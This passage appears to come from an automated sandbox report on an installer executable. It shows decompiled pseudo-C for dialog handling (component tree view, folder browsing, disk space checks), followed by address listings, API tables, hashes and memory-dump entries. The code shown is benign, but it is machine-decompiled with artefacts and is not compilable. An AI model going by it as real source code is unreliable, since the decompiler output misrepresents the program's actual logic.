										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f58) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420514;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42052c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420514 = _t315;
								 *0x42052c = _t315;
								 *0x423fa0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f59 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42052c;
									_t196 =  *0x423f68;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423f6c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42371c + 0x10)) != _t315) {
											E0040470E(0x3ff, 0xfffffffb, E00404726(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423f6c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42052c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423fa0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40,  *0x423f6c << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423f6c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423f6c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                                                          0x004047f1
                                                                                                                          0x004047f7
                                                                                                                          0x004047f9
                                                                                                                          0x004047ff
                                                                                                                          0x00404805
                                                                                                                          0x00404812
                                                                                                                          0x0040481b
                                                                                                                          0x0040481e
                                                                                                                          0x00404821
                                                                                                                          0x00404a49
                                                                                                                          0x00404a50
                                                                                                                          0x00404a64
                                                                                                                          0x00404a52
                                                                                                                          0x00404a54
                                                                                                                          0x00404a57
                                                                                                                          0x00404a58
                                                                                                                          0x00404a5f
                                                                                                                          0x00404a5f
                                                                                                                          0x00404a70
                                                                                                                          0x00404a7e
                                                                                                                          0x00404a81
                                                                                                                          0x00404a97
                                                                                                                          0x00404b0f
                                                                                                                          0x00404b12
                                                                                                                          0x00404b14
                                                                                                                          0x00404b1e
                                                                                                                          0x00404b2c
                                                                                                                          0x00404b2c
                                                                                                                          0x00404b2e
                                                                                                                          0x00404b38
                                                                                                                          0x00404b3e
                                                                                                                          0x00404b5f
                                                                                                                          0x00404b40
                                                                                                                          0x00404b4d
                                                                                                                          0x00404b4d
                                                                                                                          0x00404b3e
                                                                                                                          0x00404b38
                                                                                                                          0x00000000
                                                                                                                          0x00404b12
                                                                                                                          0x00404a9c
                                                                                                                          0x00404aa7
                                                                                                                          0x00404aac
                                                                                                                          0x00404ab3
                                                                                                                          0x00404aba
                                                                                                                          0x00404ac4
                                                                                                                          0x00404ac4
                                                                                                                          0x00404ac8
                                                                                                                          0x00404acd
                                                                                                                          0x00404ad2
                                                                                                                          0x00404ae8
                                                                                                                          0x00404ad4
                                                                                                                          0x00404ad4
                                                                                                                          0x00404adc
                                                                                                                          0x00404ae3
                                                                                                                          0x00404ade
                                                                                                                          0x00404ade
                                                                                                                          0x00404ade
                                                                                                                          0x00404adc
                                                                                                                          0x00404aec
                                                                                                                          0x00404aee
                                                                                                                          0x00404afc
                                                                                                                          0x00404afd
                                                                                                                          0x00404b09
                                                                                                                          0x00404b0c
                                                                                                                          0x00404b0c
                                                                                                                          0x00404acd
                                                                                                                          0x00000000
                                                                                                                          0x00404aba
                                                                                                                          0x00404a9e
                                                                                                                          0x00404aa5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404b62
                                                                                                                          0x00404b62
                                                                                                                          0x00404b69
                                                                                                                          0x00404bdd
                                                                                                                          0x00404be4
                                                                                                                          0x00404bf0
                                                                                                                          0x00404bf0
                                                                                                                          0x00404bf9
                                                                                                                          0x00404bfb
                                                                                                                          0x00404c02
                                                                                                                          0x00404c05
                                                                                                                          0x00404c05
                                                                                                                          0x00404c0b
                                                                                                                          0x00404c12
                                                                                                                          0x00404c15
                                                                                                                          0x00404c15
                                                                                                                          0x00404c1b
                                                                                                                          0x00404c21
                                                                                                                          0x00404c27
                                                                                                                          0x00404c27
                                                                                                                          0x00404c34
                                                                                                                          0x00404d81
                                                                                                                          0x00404d88
                                                                                                                          0x00404da5
                                                                                                                          0x00404dab
                                                                                                                          0x00404dbd
                                                                                                                          0x00404dbd
                                                                                                                          0x00000000
                                                                                                                          0x00404c3a
                                                                                                                          0x00404c3c
                                                                                                                          0x00404c44
                                                                                                                          0x00404c48
                                                                                                                          0x00404c48
                                                                                                                          0x00404c50
                                                                                                                          0x00404c91
                                                                                                                          0x00404c93
                                                                                                                          0x00404ca3
                                                                                                                          0x00404ca6
                                                                                                                          0x00404cab
                                                                                                                          0x00404cb2
                                                                                                                          0x00404cb5
                                                                                                                          0x00404d57
                                                                                                                          0x00404d5d
                                                                                                                          0x00404d6b
                                                                                                                          0x00404d7c
                                                                                                                          0x00404d7c
                                                                                                                          0x00000000
                                                                                                                          0x00404d6b
                                                                                                                          0x00404cbb
                                                                                                                          0x00404cbe
                                                                                                                          0x00404cc4
                                                                                                                          0x00404cc9
                                                                                                                          0x00404ccb
                                                                                                                          0x00404ccd
                                                                                                                          0x00404cd3
                                                                                                                          0x00404cda
                                                                                                                          0x00404cdf
                                                                                                                          0x00404ce6
                                                                                                                          0x00404ce9
                                                                                                                          0x00404ce9
                                                                                                                          0x00404cf0
                                                                                                                          0x00404cfc
                                                                                                                          0x00404d00
                                                                                                                          0x00404d02
                                                                                                                          0x00404d02
                                                                                                                          0x00404cf2
                                                                                                                          0x00404cf4
                                                                                                                          0x00404cf4
                                                                                                                          0x00404d22
                                                                                                                          0x00404d2e
                                                                                                                          0x00404d3d
                                                                                                                          0x00404d3d
                                                                                                                          0x00404d3f
                                                                                                                          0x00404d42
                                                                                                                          0x00404d4b
                                                                                                                          0x00000000
                                                                                                                          0x00404c52
                                                                                                                          0x00404c5d
                                                                                                                          0x00404c60
                                                                                                                          0x00404c65
                                                                                                                          0x00404c67
                                                                                                                          0x00404c6b
                                                                                                                          0x00404c7b
                                                                                                                          0x00404c85
                                                                                                                          0x00404c87
                                                                                                                          0x00404c8a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404c6d
                                                                                                                          0x00404c6d
                                                                                                                          0x00404c73
                                                                                                                          0x00404c75
                                                                                                                          0x00404c75
                                                                                                                          0x00404c76
                                                                                                                          0x00404c77
                                                                                                                          0x00000000
                                                                                                                          0x00404c6d
                                                                                                                          0x00404c50
                                                                                                                          0x00404c34
                                                                                                                          0x00404b71
                                                                                                                          0x00000000
                                                                                                                          0x00404b87
                                                                                                                          0x00404b91
                                                                                                                          0x00404b96
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404ba8
                                                                                                                          0x00404bad
                                                                                                                          0x00404bb9
                                                                                                                          0x00404bb9
                                                                                                                          0x00404bbb
                                                                                                                          0x00404bca
                                                                                                                          0x00404bcc
                                                                                                                          0x00404bd3
                                                                                                                          0x00404bd6
                                                                                                                          0x00000000
                                                                                                                          0x00404bd6
                                                                                                                          0x00404b71
                                                                                                                          0x00404827
                                                                                                                          0x0040482c
                                                                                                                          0x00404836
                                                                                                                          0x00404837
                                                                                                                          0x00404840
                                                                                                                          0x0040484b
                                                                                                                          0x00404856
                                                                                                                          0x0040485c
                                                                                                                          0x0040486a
                                                                                                                          0x0040487f
                                                                                                                          0x00404884
                                                                                                                          0x0040488f
                                                                                                                          0x00404898
                                                                                                                          0x004048ad
                                                                                                                          0x004048be
                                                                                                                          0x004048cb
                                                                                                                          0x004048cb
                                                                                                                          0x004048d0
                                                                                                                          0x004048d6
                                                                                                                          0x004048d8
                                                                                                                          0x004048db
                                                                                                                          0x004048e0
                                                                                                                          0x004048e5
                                                                                                                          0x004048e7
                                                                                                                          0x004048e7
                                                                                                                          0x00404907
                                                                                                                          0x00404907
                                                                                                                          0x00404909
                                                                                                                          0x0040490a
                                                                                                                          0x0040490f
                                                                                                                          0x00404912
                                                                                                                          0x00404915
                                                                                                                          0x00404919
                                                                                                                          0x0040491e
                                                                                                                          0x00404923
                                                                                                                          0x00404927
                                                                                                                          0x0040492c
                                                                                                                          0x00404931
                                                                                                                          0x00404933
                                                                                                                          0x0040493b
                                                                                                                          0x00404a05
                                                                                                                          0x00404a18
                                                                                                                          0x00000000
                                                                                                                          0x00404941
                                                                                                                          0x00404944
                                                                                                                          0x00404947
                                                                                                                          0x0040494a
                                                                                                                          0x0040494a
                                                                                                                          0x00404950
                                                                                                                          0x00404956
                                                                                                                          0x00404959
                                                                                                                          0x0040495f
                                                                                                                          0x00404960
                                                                                                                          0x00404965
                                                                                                                          0x0040496e
                                                                                                                          0x00404975
                                                                                                                          0x00404978
                                                                                                                          0x0040497b
                                                                                                                          0x0040497e
                                                                                                                          0x004049ba
                                                                                                                          0x004049e3
                                                                                                                          0x004049bc
                                                                                                                          0x004049c9
                                                                                                                          0x004049c9
                                                                                                                          0x00404980
                                                                                                                          0x00404983
                                                                                                                          0x00404992
                                                                                                                          0x0040499c
                                                                                                                          0x004049a4
                                                                                                                          0x004049ab
                                                                                                                          0x004049b3
                                                                                                                          0x004049b3
                                                                                                                          0x0040497e
                                                                                                                          0x004049e9
                                                                                                                          0x004049ea
                                                                                                                          0x004049f6
                                                                                                                          0x004049f6
                                                                                                                          0x00404a03
                                                                                                                          0x00404a1e
                                                                                                                          0x00404a22
                                                                                                                          0x00404a3f
                                                                                                                          0x00404a44
                                                                                                                          0x00404a47
                                                                                                                          0x00000000
                                                                                                                          0x00404a24
                                                                                                                          0x00404a29
                                                                                                                          0x00404a32
                                                                                                                          0x00404dbf
                                                                                                                          0x00404dd1
                                                                                                                          0x00404dd1
                                                                                                                          0x00404a22
                                                                                                                          0x00000000
                                                                                                                          0x00404a03
                                                                                                                          0x0040493b

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 004047EA
                                                                                                                          • GetDlgItem.USER32 ref: 004047F7
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404843
                                                                                                                          • LoadBitmapA.USER32 ref: 00404856
                                                                                                                          • SetWindowLongA.USER32 ref: 00404870
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 004048AD
                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048B9
                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048CB
                                                                                                                          • DeleteObject.GDI32(?), ref: 004048D0
                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004048FB
                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404907
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040499C
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049C7
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049DB
                                                                                                                          • GetWindowLongA.USER32 ref: 00404A0A
                                                                                                                          • SetWindowLongA.USER32 ref: 00404A18
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404A29
                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2C
                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B91
                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA6
                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCA
                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BF0
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                                                                                                          • GlobalFree.KERNEL32 ref: 00404C15
                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C85
                                                                                                                          • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D2E
                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D3D
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                                                                                                          • GetDlgItem.USER32 ref: 00404DB6
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404DBD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                          • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                                                                          • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                                                                                          • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                                                                                          • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42371c + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t125 =  *((intOrPtr*)( *0x423f50 + 0x11c));
								if( *((intOrPtr*)( *0x423f50 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}












































                                                                                                                          0x00404292
                                                                                                                          0x00404298
                                                                                                                          0x0040429e
                                                                                                                          0x004042ab
                                                                                                                          0x004042b9
                                                                                                                          0x004042bc
                                                                                                                          0x004042c4
                                                                                                                          0x004042ca
                                                                                                                          0x004042ca
                                                                                                                          0x004042d6
                                                                                                                          0x004042d9
                                                                                                                          0x00404347
                                                                                                                          0x0040434e
                                                                                                                          0x00404425
                                                                                                                          0x0040442c
                                                                                                                          0x0040443b
                                                                                                                          0x0040443b
                                                                                                                          0x0040443f
                                                                                                                          0x00404449
                                                                                                                          0x00404456
                                                                                                                          0x00404458
                                                                                                                          0x00404458
                                                                                                                          0x00404466
                                                                                                                          0x0040446d
                                                                                                                          0x00404474
                                                                                                                          0x00404477
                                                                                                                          0x004044ae
                                                                                                                          0x004044b0
                                                                                                                          0x004044b6
                                                                                                                          0x004044bb
                                                                                                                          0x004044bf
                                                                                                                          0x004044c1
                                                                                                                          0x004044c1
                                                                                                                          0x004044dd
                                                                                                                          0x00000000
                                                                                                                          0x004044df
                                                                                                                          0x004044e2
                                                                                                                          0x004044f0
                                                                                                                          0x004044f6
                                                                                                                          0x004044f7
                                                                                                                          0x004044fa
                                                                                                                          0x004044fd
                                                                                                                          0x00000000
                                                                                                                          0x004044fd
                                                                                                                          0x00404479
                                                                                                                          0x0040447b
                                                                                                                          0x0040447f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404481
                                                                                                                          0x00404481
                                                                                                                          0x0040448e
                                                                                                                          0x00404493
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404497
                                                                                                                          0x00404499
                                                                                                                          0x00404499
                                                                                                                          0x004044a4
                                                                                                                          0x004044a7
                                                                                                                          0x004044ac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004044ac
                                                                                                                          0x00404509
                                                                                                                          0x00404513
                                                                                                                          0x00404516
                                                                                                                          0x00404519
                                                                                                                          0x00404520
                                                                                                                          0x00404520
                                                                                                                          0x00404522
                                                                                                                          0x00404522
                                                                                                                          0x00404527
                                                                                                                          0x00404529
                                                                                                                          0x00404531
                                                                                                                          0x00404538
                                                                                                                          0x0040453a
                                                                                                                          0x00404545
                                                                                                                          0x00404545
                                                                                                                          0x0040453a
                                                                                                                          0x00404555
                                                                                                                          0x0040455f
                                                                                                                          0x00404567
                                                                                                                          0x00404582
                                                                                                                          0x00404569
                                                                                                                          0x00404572
                                                                                                                          0x00404572
                                                                                                                          0x00404567
                                                                                                                          0x00404587
                                                                                                                          0x0040458c
                                                                                                                          0x00404591
                                                                                                                          0x0040459a
                                                                                                                          0x0040459a
                                                                                                                          0x004045a3
                                                                                                                          0x004045a5
                                                                                                                          0x004045a5
                                                                                                                          0x004045b1
                                                                                                                          0x004045b9
                                                                                                                          0x004045c3
                                                                                                                          0x004045c3
                                                                                                                          0x004045c8
                                                                                                                          0x00000000
                                                                                                                          0x004045c8
                                                                                                                          0x00404477
                                                                                                                          0x0040442e
                                                                                                                          0x00404435
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404435
                                                                                                                          0x00404354
                                                                                                                          0x0040435d
                                                                                                                          0x00404377
                                                                                                                          0x0040437c
                                                                                                                          0x00404386
                                                                                                                          0x0040438d
                                                                                                                          0x00404399
                                                                                                                          0x0040439c
                                                                                                                          0x0040439f
                                                                                                                          0x004043a6
                                                                                                                          0x004043ae
                                                                                                                          0x004043b1
                                                                                                                          0x004043b5
                                                                                                                          0x004043bc
                                                                                                                          0x004043c4
